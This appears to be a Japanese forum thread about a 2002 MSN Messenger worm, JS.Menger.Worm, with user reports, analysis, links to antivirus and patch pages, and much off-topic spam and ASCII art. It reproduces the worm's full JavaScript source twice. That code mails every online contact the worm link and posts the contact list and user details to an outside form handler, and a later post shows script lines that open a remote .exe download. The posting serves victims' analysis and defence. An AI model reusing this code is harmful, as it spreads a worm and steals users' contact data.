MSN(Windows)メッセンヂャーで

URGENT - Go to http://users.skynet.be/dark.angel/cool.htm
登録してあるいろんな人から↑のようなメッセージが届きまくってるんですが・・・これナニ？

そのアドレスクリックしたら、リストにあるメンバーに同じ物を
送ってしまう模様

>>2
ああ、そうなんだ。要はクリックしなきゃいいんだね？

怖いのでさげ…

クリックしちまった・・・

とりあえずクリックは禁止です。
中身見てみたんだけどIPは抜かれてるみたい。
固定IPじゃないなら繋ぎ直してIP変更しておくほうがいいです。

識者の方いたら解析きぼんぬ。

<html>
<head>
<title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "URGENT - Go to http://users.skynet.be/dark.angel/cool.htm";
//var msgStr = "URGENT - Go to <a href="http://users.skynet.be/dark.angel/cool.htm">www.ratec.ar.cx</a> NOW";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center"> 
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.ratec.ar.cx" ID="Hidden1">
<input type="hidden" name="recipient" value="[email protected]" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>
</html>

ソースね
これは悪質だ

afe

これ、結局なんなの？

みたところ

1. あなたのリストでオンラインの人全員に URGENT - Go to http://users.skynet.be/dark.angel/cool.htm というメッセージを送る
2. 日付，あなたとあなたのリストに登録されてる人全員の名前とメールアドレス，あなたの IP アドレスと Web ブラウザの種類を [email protected] に送る

ようです．

[email protected]
送ってる？

unmetered（計測、測定されていない）はダミーか・・・

１０人位から一気に来て、３０人位に送っちまったよ（死

どうしよ？

１、破壊活動はありますか？
２、ワクチン等はどこで？

博識のかた、よろしくお願いします。、、、、、ﾁﾝﾊﾟｲ（´Д｀;）ヾ

>15
気にするな,タダの祭りだよ！

てきとーなメール送ろうとしたら
エラー : アドレス '[email protected]" が存在しません。このメッセージは送信されませんでした。

ってなって送れなかった。

>>15
>>12 の推測が当たっているなら

1. 特に見あたりません
2. 特に必要ありません

>>16
ETC の forum は祭り状態になってますね

つまりココを書換えて（以下略

>>15
2. に関して，どうやら IE のパッチが公開されているようです．
http://pc.2ch.net/test/read.cgi/pcnews/1013485960/

パッチ入れてて踏んじゃったんだよなぁ(´ー｀)
今のところ何も言われてないから被害はなしかな？

もう友達から送られちゃったし、クリックしちゃったし
、自分も送ったらしいからやヴぁい( ゜Д゜）ｺﾞﾙｧ!

ウィルス直リンしてあほか…。

((((((｡ ﾟДﾟ)ﾉ ﾇｵｫｫｫ!!怒るでしかし！！

ふんじゃったよー
でも、ＵＲＬ存在しないと出たよ、ＩＥ６だから？

http://help.msn.co.jp/maintenance.htm#MESBUD
これをみろ。

終了---------------------------------------------------------------------------------------------

漏れＵＲＬクリックしたんだけど、
ＵＲＬクリックした人、大丈夫かＹＯ！！
ガクガクブルブル((((((｡;ﾟДﾟ)何かなってたらどうしよう・・。

>>27
俺再起動したけどどうもない

踏んじゃったけど、発信してないみたいだなぁ
ノートンＰＦＷとルーターの所為かな？

http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl

↑こいつが500になってるから

ここ見るとオイラのノートンが
反応するのですが？
気のせい？

また新しいの来た。

A trop excelent va voir !! http://insurektiontest.free.fr

オンラインのひと全部の窓が開いたぞ

同じ仕組みのやつなのかな。

>>34
iriaで落としたけど大体同じだったよ。

ところでブラウザからソース見る時ってどうやるんだっけ？
〜〜〜view:http://www.〜〜〜〜って感じのやつ。

>>35　みたいURLのhttpの前に[view-source:]の[]内を入れればOK。

>>35
view-source:http://〜
だす。

>>36 >>37
ああ、〜view:じゃなくて
view-source:だったか〜。アリガトォ！！

糞！踏んだー

さっきノートン先生の定義ファイルを更新したとこだったよ。
あぶねー。

>>32
今、それきたよ〜。
>>36-37でソースみたら、ノートン先生が反応したよ。
さっきウィルス定義自動更新されたのはこのせいだったのか。。。

くそ流行だしてるYO

漏れも踏んだけど、ＶＢ２００２が反応した

そもそも、MSNメッセンジャ削除したらいいんでないの？

>>44それは強引だろ。


漏れもノートンアプデトしてたから無事だが、これはトロイ？

ばすきゃんハンノウシネ〜ヽ(`Д´)ノ

<script>
azao=window.open
('http://kit.carpediem.fr/13244/CD/CineVoyeur.exe',
'azao','toolbar=0,location=1,status=0,
menubar=0,scrollbars=1,width=5,height=5');
</script>
<script>
window.open('http://genesis.ift.cx');
</script>

↑これが追加されてるな
exeファイル落としそうになった
俺も踏んじまったがＩＥ６だったんで確認が出た（？）

>>45
ワームみたいだね。

シマンテックのページ
http://www.symantec.com/region/jp/sarcj/data/j/js.menger.worm.html

C:\WINDOWS\Temporary Internet Filesからも感染するから、削除しなはれ。

トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_MENGER.GEN

C:\Documents and Settings\●\Local Settings\Temporary Internet Files\Content.IE5\WX0HIJ01\l50[3]
は JS.Menger.Worm ｳｨﾙｽに感染しています｡
このﾌｧｲﾙを修復できません｡

ファイルが見あたらないんだが。
Content.IE5フォルダのフォルダ全部削除してやりました。

ieのプロバティから、全般のタブその中からファイルの削除でできなかった？＞51

>>52
わからん。出来るとは思うけど。
Content.IE5はアクセス拒否とか出てスキャンしてくれないし

修正プログラム。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/download.asp

>>53
う〜ん。。HTMLファィルだよね？
アクセス拒否くらうもんなのかなぁ。

>>55
HTMLなのかすら不明。
WX0HIJ01フォルダには何一つファイルは入ってなかったし。

JS.Exception.Exploitもウィルス検索では引っかからなかったし。
イベントビューア見て初めて発見したよ。
今回も同じで検索では引っかからずイベントビューアで発見。

>>56
んとね、俺が感染した奴はhtmlファイルからだったの。
だから感染元はHTMLファイルで間違いないと思うのね。
で、隠しファイルを表示するとかにして確かめてみた？
それで見えないとなるとちとやっかいだね。。

>>58
もちろん。
隠しファイルも表示してセーフモードで調べたもん。

>>1
セーフモード起動で、
C:\Windows\Sysem\mshtml.dll を
mshtml.vir にして、Win 再起動したらドーヨ？

IEのパッチとメッセンジャーバージョンアップしないと駄目だな

javascriptきれよ

>>31
このスレッドの上の方でウイルスのソースが貼ってあるせいだろ。

「JS.Menqer.Worm」が検出された藁

IEパッチとメッセンジャー最新版でも防げない（藁
人柱になってやった俺に感謝せよ

<head> <title>Welcome</title>
<Script>

var msnWin;
var msnList;
var msgStr = "URGENT - Go to http://####1";
//var msgStr = "URGENT - Go to <a href="http://####1">www.ratec.ar.cx</a> NOW";
function Go(){
msnWin = document.open("res://####2", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1">
</object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ",
email: " + msnList(i).LogonName + "<br>";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ",
email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type:
text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>
</head>
<body onload="Go()">
<p align="center"> 
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="http://####3"; NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://####4"; ID="Hidden1">
<input type="hidden" name="recipient" value="[email protected]" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
</body>

http//users.skynet.be/dark.angel/cool.htm

これをクリックしてジャンプすると、自分の登録しているユーザに同様の
メッセージが送られ、蔓延します。

但し周りの状況から推察するに、これが起きるのはどうも Windows の
デフォルトブラウザが IE の場合のようです。当方 Opera6 をデフォルト
ブラウザにしているのですが、これは起きませんでした。

これについての情報を少し漁ってみたのですが、WWW 上では見当たりません
でした。それでこのソースを取得してみました。見たところクライアント
サイド実行型のスクリプトのようですが、当方ではちょっと分からないので
よろしければご教授頂けると幸いです。

本来ならば先頭と最後に <html></html>タグが入りますがここでは念のため
割愛しておきます。

また、URL が直接的にあらわれる部分は以下のように変更しています。

####1 = 'users.skynet.be/dark.angel/cool.htm'
####2 = 'mshtml.dll/blank.htm'
####3 = 'www.rjdesigns.co.uk/cgi-bin/FormMail.pl'
####4 = 'www.ratec.ar.cx'

http://memo.st.ryukoku.ac.jp/archive/200202.month/2955.html
にある。

上のリンク踏んだら、
「Js.Menger.Worm が検出されました」ってノートン先生がおっしゃったよー!
とりあえずﾊｹｰﾝされたファイルは削除したけど…。何で開いていきなり感染??

あと、他の板でも見かけたけど、
MSNメッセンジャーの新しいバージョンが出た（Messenger v4.6)っていうからインストールしようとしたら、
「内容と署名が一致しません」…これって普通だったっけ??

XP標準のMSNはいいよ。広告がなくってさ。

MSNのプロフィールの更新日って内容がどこも変ってないのに
更新日付だけが更新されているんですけど
なぜ？？

>>72
スレ違い

>>74 sine

（＾＾）

（＾＾）

踏んじゃったyo（´Д｀;）レス確認しようよ私。
ﾁﾝﾊﾟｲで再セットアップしますた。←やり過ぎ

結局IPはぬかれてるの？ルーターで固定IPだったら心配ないのかな？

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

　　　　 ／∵　 ▼ ＼
　　　 /∴ 　　　　　　ヽ　　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　　 , |∴　　　／　 ＼　|、　　　／　
　　|｀──-( ／ )-( ＼)l | 　＜　　 ちゃんと見てくれたか？
　　| [　　　　 ,　　 っ　　l | 　　 ＼　
　　`-, 　　　 'ヽ､＿ソ　 }'　　　　　＼＿＿＿＿＿＿＿＿＿＿＿＿
　　 ノ ヽ､　　　 ｀' 　　ノ､　　　　　
　/ 　　　　ゝ ── '　　 ヽ
/　　　,ｨ -っ､　　　　　　　 ヽ
|　 ／　､__ う　人 　･　,.y　 i
| 　　　/　　　　　　 ￣　|　　|
ヽ､__ノ 　　　　　　　　　ﾉ　 ﾉ
　　|　　　　　　x　　　 9　 /
　　 | 　　ヽ､_　　_,ノ　彡ｲ
　　　| 　　　　（U）　　　　|　
http://cgi.2chan.net/n/src/1056821090165.jpg

　　　　　　　　　　　　, -;;'".:.:.:.:./`=-;,_　/ _='　_
　　　　　　　　　　, '";;;;;.:.:.:.:.:.:.r'/;/;彡;Xik''"ミ`ミ;､
　　　　　　　　　 ,':..:.:.''''':.:.:.:.:.:.:.!;;;:::::_／/lj_,.>ﾐﾐﾐヾ,' 　　　ロマンティックageるよ
　　　　　　　　　;;.:.:.:.:.:.:.:.:.:.:.:.:.:.!　　 `;:/,_l　　l!lll;:`;
　　　　　　　　　!l!ill!!l.;.;!;!;!!l.:l:l:.l , - ､ :/:l　　j!ll l
　　　　　　　　　l;!!;l;l;i"l｀ﾒl.!;;l;l;:i　_,　 l,､;!　　　j! 　　　　ロマンティックageるよ
　　　　　　　　　.!l!ll!l !,!l=､!i !.! l!'i,:`i ,.lkj
　　　　　　　　　l(yk. ﾐ(iﾍ!､　　　!j !l'..ﾚ'l
　　　　　　　　　l!ヽﾍ ,.｀-'｀　,j　　　 .,!l;l 　　　　　　　　 ホントの勇気　見せてくれたら
　　　　　　　　 /!l.!;`'ﾍ/`> -､_;:z'　 ﾉ;!;!'!
　　　　　　 _.ノ　l!l!;l;!;l;i:ゝ=...,,___..／;i;l;!!j
　　　　　　　　　 !l;l;! !l;l;i:l:　l　　 l;|l;l;!;!;!' 　　　　　　　　 ロマンティックageるよ
　　　　　　　　　 ,.._ヽl;l;l;l;l;.ﾒ　　　jl二`il~`ヽ.
　　　　　　　_,.-''`y,// /L,.___v ___!l　|!l l_,,./ヽ
　　　　　,-'"　　　 l!l　l!`-ﾘi,-=''+;:i',! .|!!. ヾ.._/ 　　　　 ロマンティックageるよ
　 ,.ゝ=;"　　　　_,,. l　　ﾞ`=''`!__,,,.jl"　　》　 　l
./　　ヽ`y,,.. -'"　`/　　　　　　　　　.l!'l!　 　 !

`,　　`､｀､　　　　 i　　　　　　　　　 丿/　(二! 　　　　　トキメク胸に　キラキラ光った
　`ﾒ,　　　>　　　　`--=　　　　=-‐,' `==== ゝ
　　 `k,/'" `､　　　　|　/　　,.',.'/　,/　　!　　r
　　　　`.､;／ゝ､　　i~~~ｺ~!ﾄ二l!ｺ!}'i　　k　　l 　　　　　夢をageるよ
　　　　　ゝ'"　　`;'"　　　 -|!　ヽヾ《　　 l　 ,,:j
　　　　　　k_,_,i='"　　 ‐-=|!　　 ヽヾ､_　 ﾚ'"　!　　　　__　　 ,;。
　　　　　　　/ /　　　　　 |!　　　　` y `i`l_,. "l　　　　iniy'='y''
　　　　　　,/_/,,,.....,,,,,_ﾐ　.j!=''"　　　/j ..l l='"~`i　　_=' ...:::::lr
　　　　　　r~　　　 　 `;ミ__,,.　　　/"　.l_j　k_,,='j'='"ﾆ::::::::::j
　　　　　　!　　　　　　　 ||　　　　　　　l　 {,-,v'"!L{,:::;;:::.-'"
　　　　　　!　　　　　　　 !'|i＼　　　　,-'l-'/./_,=i"! `-'"
　　　　　　l　　　　　　　 ! '||　＼　,-'" ,,l　y_/　l!l'
　　　　　　l　　　　　　　 !　|.!_,,-'"　,-'".l　l .l`='"

MSNでしらないところから広告？見たいなメッセくるのはなんですか？

あげ荒らし帰れよ

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

(？？Д？？)？？？？？？
？？？？？(？？Д？？)？？？？？？

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

質問ですが
以下のサインイン名に対して、正しくないパスワードを入力した回数が多すぎます :
とでてきたのですが不正アクセスでも食らったのでしょうか・・・
時間たってもなおらないのですが・・・

このすれ、ずっとレス付いてないのに、のこってるよ・・・

MSNメッセで、デジカメ画像のファイル送信をしたところ、相手側のPCの調子がおかしくなりました。
ネットに接続できないとか。
もちろん画像にウィルスが付いているはずもなく（チェック済み）。
何が原因でしょう？こんなことってあるんですか？？

英語のスパムメールをブロックするソフトや方法なないのかね。ｓｐｙ−ｂｏｔやａｄ−ａｗａｒｅ
以外に。

msn messengerのビデオチャット録画する方法おしえてください。
変死ん　激しく希望

まだまだ無料で使える部屋があります。
とりあえず　http://chat.msn.com/chatroom.msnw?rm=JudyGreenroom&pgmarket=en-ca
へどうぞ
詳しい説明をします。

http://www.douga-ch.net/files.php?no=20951&junle=shirouto&filename=20951.wmv

おめこ






























意味もなく

t

11 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2007/06/24(日) 04:02:46
WORM STRATION.KUってのがメッセから感染して
隔離できない　手動でも削除できないUZEEe

内容はメッセをかいして登録してあるフレンドにメアドとかを送るものっぽい・・

↑俺もこれきたわ・・・

test

(^o^)ﾉ＜最下層だぞくずどもー

　 _ 　∩
(　ﾟ∀ﾟ)彡　八尾あげ！八尾あげ！
　⊂彡

　 _ 　∩
(　ﾟ∀ﾟ)彡　八尾あげ！八尾あげ！ 八尾あげ！八尾あげ！
　⊂彡

　 _ 　∩
(　ﾟ∀ﾟ)彡　持ち越せ！持ち越せ！
　⊂彡

tesuto

　　 /////
　　（　・ω・）　　　監視中
　　,ノﾞﾞﾞﾞﾞﾊヽ、　
　 `〜ｪ-ｪｰ'

　　 /////
　　（　・ω・）　　　監視中
　　,ノﾞﾞﾞﾞﾞﾊヽ、　
　 `〜ｪ-ｪｰ'

　

　 /////
　　（　・ω・）　　　監視中
　　,ノﾞﾞﾞﾞﾞﾊヽ、　
　 `〜ｪ-ｪｰ'

　 /////
　　（　・ω・）　　　監視中
　　,ノﾞﾞﾞﾞﾞﾊヽ、　
　 `〜ｪ-ｪｰ'

てｓ

..

下げえええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええええ

00

てｓｔ

test

テス

test

　　　　　　　　　　　

age

document.write("<body onload=window();>")

　　∧_∧
⊂（ ・ω・） 　そもそもリモコンなどない！
　/　　　ﾉ∪
　し―-J　|l| |
　　 　 　 　 人ﾍﾟｼｯ!!
　　　　　　　 ＿＿
　　　　　　　ｌ＿＿ｌ

　　　　　 _
　　　　　 |O＼
　　　　　 |　　 ＼　ｷﾘｷﾘ
　　　　∧|∧ 　　＼　ｷﾘｷﾘ
ｸﾞｸﾞｩ>（；⌒ヽ　　　 ＼
　　　　∪　　|　　 　　(~)
　　　　　∪∪　　 γ´⌒｀ヽ
　　　　　）　）　　 　{i:i:i:i:i:i:i:i:}
　　　　 （　（　　　　(　´･ω･)、
　　　　　　　　　　　(O ⌒　)O
　　　　　　　　 　 　⊂＿)∪

ふう